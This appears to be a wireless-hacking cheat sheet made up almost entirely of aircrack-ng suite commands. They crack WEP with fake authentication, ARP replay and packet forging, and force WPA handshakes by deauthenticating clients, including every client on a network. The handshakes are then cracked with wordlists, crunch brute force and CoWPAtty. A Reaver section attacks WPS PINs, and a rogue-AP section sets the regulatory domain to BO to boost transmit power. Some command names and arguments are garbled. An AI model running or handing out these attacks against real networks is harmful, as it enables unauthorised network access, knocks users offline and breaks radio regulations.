802-11 Wireless
Getting Started
Confirming Airmon-ng Status
Airmon-ng check kill
Enter monitor mode
Airmon-ng start wlan#
Capture packets from a specific channel
Airdump-ng mon0 --channel #
Save airodump capture to file
Airodump-ng -w filename mon0 --channel 6
Generate wireless traffic via injecting packets to quickly gather the IVs
Aireplay-ng -1 0 -e SSID -a SSID MAC -h MAC mon0
-1 tells aireplay-ng to fake autentication
0 is the retransmission time
-e the sssid of access point
-a mac address of ssid
-h your mac address - check adapter
Mon0 - interface to use for fake auth
Generating Ivs w/ the ARP Request Replay Attack
Aireplay-ng -3 -b SSID MAC -h MAC mon0
-3 performs arp replay attack
WPA2
To crack WPA2 wifi we must capture the 4 way handshake. To learn more about the 4 way handshake.
https://www.wifi-professionals.com/2019/01/4-way-handshake
Airodump-ng -c 6 --bssid ssid-mac -w handshake mon0
-c channel to use
--bssid = ssid of wifi
-w write file to filename
To force a client to reauthenticate so we can capture the handshake use the following
Aireplay-ng -0 1 -a SSID MAC -c client MAC mon0
-0 means deauth
1 - how many deauth packets to send
Once you have enough handshakes captured you can run the cap file agaist a wordlist to crack the phrase
Aircrack-ng -w passwordlist.txt -b SSID MAC filename*.cap
WEP
airmon-ng start wlan0 <AP Channel>
airodump-ng -c <AP Channel> --bssid <AP MAC> -w <filename> wlan0mon
aireplay-ng -1 0 -e <AP ESSID> -a <AP MAC> -h <Attacker MAC> wlan0mon
aireplay-ng -3 -b <AP MAC> -h <Attacker MAC> wlan0mon
ARP Replay
aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> wlan0mon
aircrack-ng -0 <filename.cap>
airmon-ng start wlan0 <AP Channel>
airodump-ng -c <AP Channel> --bssid <AP MAC> -w <filename> wlan0mon
aireplay-ng -1 0 -e <AP ESSID> -a <AP MAC> -h <Attacker MAC> wlan0mon
aireplay-ng -5 -b <AP MAC> -h <Attacker MAC> wlan0mon
packetforge-ng -0 -a <AP MAC> -h <Attacker MAC> -l <Source IP> -k <Dest IP> -y <xor filename> -w <packet filename>
tcpdump -n -vvv -e -s0 -r <packet filename>
aireplay-ng -2 -r <packet filename> wlan0mon
aircrack-ng -0 <filename>
WPA PSK
airmon-ng start wlan0 <AP Channel>
airodump-ng -c <AP Channel> --bssid <AP MAC> -w <filename> wlan0mon
aireplay-ng -0 1 -a <AP MAC> -c <Victim MAC> wlan0mon
aircrack-ng -0 -w <wordlist> <capture file>
You can capture the handshake passively (it takes time) or de-authenticate a client.
De-authentication attack
aireplay-ng --deauth 3 -a <BSSID> -c <client_mac> mon0
Deauth every client
aireplay-ng -0 5 -a <bssid> mon0
Dictionary Attack
aircrack-ng -w passwords.lst capture-01.cap
Brute force Attack
crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap
CoWPAtty Attack
Wordlist mode:
cowpatty -r <Capture file> -f <wordlist> -2 -s <AP ESSID>
PMK mode:
genpmk -f <wordlist> -d <hash filename> -s <AP ESSID>
cowpatty -r <Capture file> -d <hash filename> -2 -s <AP ESSID>
Rogue Access Point Testing
--------------------------
# ifconfig wlan0 down
# iw reg set BO
# iwconfig wlan0 txpower 0
# ifconfig wlan0 up
# airmon-ng start wlan0
# airodump-ng --write capture mon0
ifconfig wlan1 down
iw reg set BO
ifconfig wlan1 up
iwconfig wlan1 channel 13
iwconfig wlan1 txpower 30
iwconfig wlan1 rate 11M auto
Reaver
------
airmon-ng start wlan0
airodump-ng wlan0
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1
Last updated